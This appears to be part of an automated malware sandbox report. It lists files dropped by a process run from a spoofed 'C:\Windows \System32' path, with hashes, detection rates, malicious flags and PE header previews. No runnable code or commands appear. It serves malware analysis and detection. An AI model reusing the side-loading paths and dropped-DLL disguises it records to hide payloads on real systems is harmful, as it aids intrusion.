                                                                                                                                                                                                SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
                                                                                                                                                                                                MD5:158BC77453D382CF6679CE35DF740CC5
                                                                                                                                                                                                SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
                                                                                                                                                                                                SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
                                                                                                                                                                                                SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....

                                                                                                                                                                                                C:\Windows\System32\libintl-9.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):475769
                                                                                                                                                                                                Entropy (8bit):5.442192544327632
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
                                                                                                                                                                                                MD5:E79E7C9D547DDBEE5C8C1796BD092326
                                                                                                                                                                                                SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
                                                                                                                                                                                                SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
                                                                                                                                                                                                SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....

                                                                                                                                                                                                C:\Windows\System32\libpq.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):327168
                                                                                                                                                                                                Entropy (8bit):6.055910692008984
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
                                                                                                                                                                                                MD5:EF060E5C414B7BE5875437FF2FB8EC54
                                                                                                                                                                                                SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
                                                                                                                                                                                                SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
                                                                                                                                                                                                SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\libssl-3-x64.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):818176
                                                                                                                                                                                                Entropy (8bit):6.269258421632734
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
                                                                                                                                                                                                MD5:69D0FEE0CC47C3B255C317F08CE8D274
                                                                                                                                                                                                SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
                                                                                                                                                                                                SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
                                                                                                                                                                                                SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\libwinpthread-1.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):52736
                                                                                                                                                                                                Entropy (8bit):5.840253326728635
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
                                                                                                                                                                                                MD5:9DC829C2C8962347BC9ADF891C51AC05
                                                                                                                                                                                                SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
                                                                                                                                                                                                SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
                                                                                                                                                                                                SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\ucrtbased.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1786880
                                                                                                                                                                                                Entropy (8bit):6.056894707447503
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
                                                                                                                                                                                                MD5:C3130CFB00549A5A92DA60E7F79F5FC9
                                                                                                                                                                                                SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
                                                                                                                                                                                                SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
                                                                                                                                                                                                SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'.S.c.=.c.=.c.=.j...P.=.c.<...=..}.b.=..}.S.=..}.'.=..}...=..}.u.=..}.b.=..}.b.=.Richc.=.........PE..d...~.!U.........." .................................................................g....`A........................................p........C..................x................... ...............................`...................H............................text............................... ..`.rdata...x.......z..................@..@.data...(Z...`...$...J..............@....pdata..x............n..............@..@.rsrc................2..............@..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\usvcldr64.dat

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):15119360
                                                                                                                                                                                                Entropy (8bit):6.556441260112958
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:393216:9PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCoJTQP76NuudqFcrSdEVB3:9ITk5mc
                                                                                                                                                                                                MD5:2841E4C0218168DA26F26EC2FE2F8C99
                                                                                                                                                                                                SHA1:77F35369EAFF3DC314CBE34668C687A4FDE7B262
                                                                                                                                                                                                SHA-256:71DF2DCECF03D6BC803FCD9E30380E41B629D294CDA9F8A0505E1E669B7B86CC
                                                                                                                                                                                                SHA-512:4AA65D842392E0CBD16ABD52CAFB495C645A7900AE1D0AC0704B69D6DA0EB770856164A79353DB54CC7A33693F56C20AE1301AA09877E5858527FB64A63090C7
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4K.p*..p*..p*.......*......b*......v*..`...z*..`...~*..`..."*......u*..p*...*..;...q*..;.F.q*..;...q*..Richp*..................PE..d.....(g.........." ...)............(........................................ ............`..................................................Z..<................5......................8.......................(.......@...............x............................text............................... ..`.rdata...V.......X..................@..@.data...\2...p.......V..............@....pdata...5.......6...n..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\vcruntime140d.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):131920
                                                                                                                                                                                                Entropy (8bit):6.0574531251583865
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:QB6NlnzaWMj6FBknM+eHLEQE9gHAWdwfP5sd4Sohg7vMHvqZecb399R0BqZEBFP:QBYl5MOcM1HAb1wM0ecb39/0BqZEjP
                                                                                                                                                                                                MD5:F57FB935A9A76E151229F547C2204BBA
                                                                                                                                                                                                SHA1:4021B804469816C3136B40C4CEB44C8D60ED15F5
                                                                                                                                                                                                SHA-256:A77277AF540D411AE33D371CC6F54D7B0A1937E0C14DB7666D32C22FC5DCA9C0
                                                                                                                                                                                                SHA-512:CD9FC3FC460EBA6A1B9F984B794940D28705ECB738DF8595C2341ABE4347141DB14A9FF637C9F902E8742F5C48BBB61DA7D5E231CC5B2BAD2E8746C5A3E3E6ED
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].AB<..B<..B<....h.@<....L.A<..B<..l<..yb..I<..yb..V<..yb..Z<..yb..C<..yb\.C<..yb..C<..RichB<..................PE..d....LZW.........." .....j...\......pg....................................... ...........`A...........................................4.......<.......................P?......t...p...T...........................................................................text....h.......j.................. ..`.rdata..F5.......6...n..............@..@.data...............................@....pdata..............................@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\winsvcf\winlogsvc

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):384
                                                                                                                                                                                                Entropy (8bit):7.478489958996096
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:a1yzGK019rYhVXAsui2cxoOFO79eNtId8qXjo+4M8Oa14BwBRA20Ghz+U18xwwb+:qm4BYhVXAst2cx7OxeM5Uww4BN/tUHHB
                                                                                                                                                                                                MD5:799A896203DA94B133F6815901D3C417
                                                                                                                                                                                                SHA1:EFE8264541E3520CDF9CB10ADC8AF9BE204C316C
                                                                                                                                                                                                SHA-256:4DABED17307FE1686ABAB13F62FD2F0AFC7EBC90DBA45D9B93FAB68DAA4FB200
                                                                                                                                                                                                SHA-512:B548F8F4B29DDE557BB71EC980F604077FFB83F65B7ADC7A01DF73CC5CD924AF2C0E23F659688E077A1CE6D1A035251ED3F92B40ACECDD19337897ACC52E127C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.....S.N....A....N...-.p...Hbx.Q...Q.=L.4#V.s...N..)...+c...._.;.j;....+.q....4.S..c.\.X.. .$.ba.t.*..x.-3..M..a..+.A...#.........Pq9..i..ET.B..A..PP...p-...Y,.9"./oc.|\.H&..<{..5..c^..K..#...../..'a.S....[.....hZ.........3....{.].\;a}.n...t...'.=_!.A.....?.=Kq....g.....S....F..N._...>..MZZ.m......rb...H.9..H...B.....3............Y4%........Jr..6....."....k]e.o.

                                                                                                                                                                                                C:\Windows\System32\x882081.dat

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2311168
                                                                                                                                                                                                Entropy (8bit):6.552556779924142
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:FsVRewXhjIyfX8Hp4lJEdCW1Rt+lvSh0lhSMXldobsewf6oV9h0lhSMXln98GzsI:WVReKrGAEdCW1uPfewfv0GlUDYwT
                                                                                                                                                                                                MD5:F3A0A68DA39ADD0D56D930A3E52D9E72
                                                                                                                                                                                                SHA1:FD789D32C2C7CAB5EE43DCC9505471A98EAC7E70
                                                                                                                                                                                                SHA-256:4B85B41D750888AEE1D9CC19E9F1F96191052184A8A6A5D6EF901519F514B7C8
                                                                                                                                                                                                SHA-512:E89451CE69C676449A1F1B25C790DD1BA601F7781FD3A70BF27BB5840C89B262109B7F09859EAF0730422F724C33FF101C8DE2F4F0A5619060AAB9AFE050FCEA
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'u.qc.."c.."c.."...#..."...#j.."s..#m.."+..#a.."...#z.."s..#h.."s..#..."...#a.."...#l.."c.."s.."(..#q.."(..#b.."(.9"b.."(..#b.."Richc.."........PE..d....W.g.........." ...)............$'........................................#...........`..........................................P".P...PP".......#.......".0.............#.l..... .8..................... .(...@. .@............................................text...T........................... ..`.rdata.............................@..@.data...l}...p"..J...R".............@....pdata..0.....".......".............@..@.fptable......#......(#.............@....rsrc.........#......*#.............@..@.reloc..l.....#......,#.............@..B........................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\System32\zlib1.dll

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows \System32\printui.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):90624
                                                                                                                                                                                                Entropy (8bit):6.509332615593886
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:Wc9wKxbEwda1CzUbFfbpVxyRyxpGTlKAbe6IOcIOZyyFz5o9X2153:7uKxbEwUEAhbprCOGTKISZyuVo9GT
                                                                                                                                                                                                MD5:F53D1EFEA4855DA42DA07DE49D80BA68
                                                                                                                                                                                                SHA1:920349F4BD5A5B8E77195C81E261DFA2177EB1EE
                                                                                                                                                                                                SHA-256:7E9F43688189578042D791E3E5301165316EDC7C1ED739E0669C033A3CA08037
                                                                                                                                                                                                SHA-512:5D72F64B8E5C42A3C9A7BCBBE8A1598A85402ADE4F312AB9E26869F8B39952A3AA037F2CF7DA89E686C5BC3FCB221FEEAE077B9FFD2EEF98DAC0E307637FE7BD
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&.i.&.i.&.i./.....i.6qh.%.i.6q..".i.6qj.%.i.6qm...i.6ql.*.i.Vth.$.i.&.h...i.npm.).i.npi.'.i.np..'.i.&...'.i.npk.'.i.Rich&.i.........PE..d...a..f.........." ...)..................................................................`..........................................O......@W..........P....p..@...............l....>..T...........................`=..@...............x............................text............................... ..`.rdata...l.......n..................@..@.data........`.......L..............@....pdata..@....p.......N..............@..@.rsrc...P............Z..............@..@.reloc..l............`..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_1tyffxkh.w5q.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_1w15b55i.0mr.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_2adcb0xd.34u.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_2pyflsdo.roa.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_4dxugyql.w5j.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_bo2rqf0s.bka.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_byhv4cgd.ihm.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_mdps3lo2.in2.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Windows\Temp\__PSScriptPolicyTest_migp50yh.yeg.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
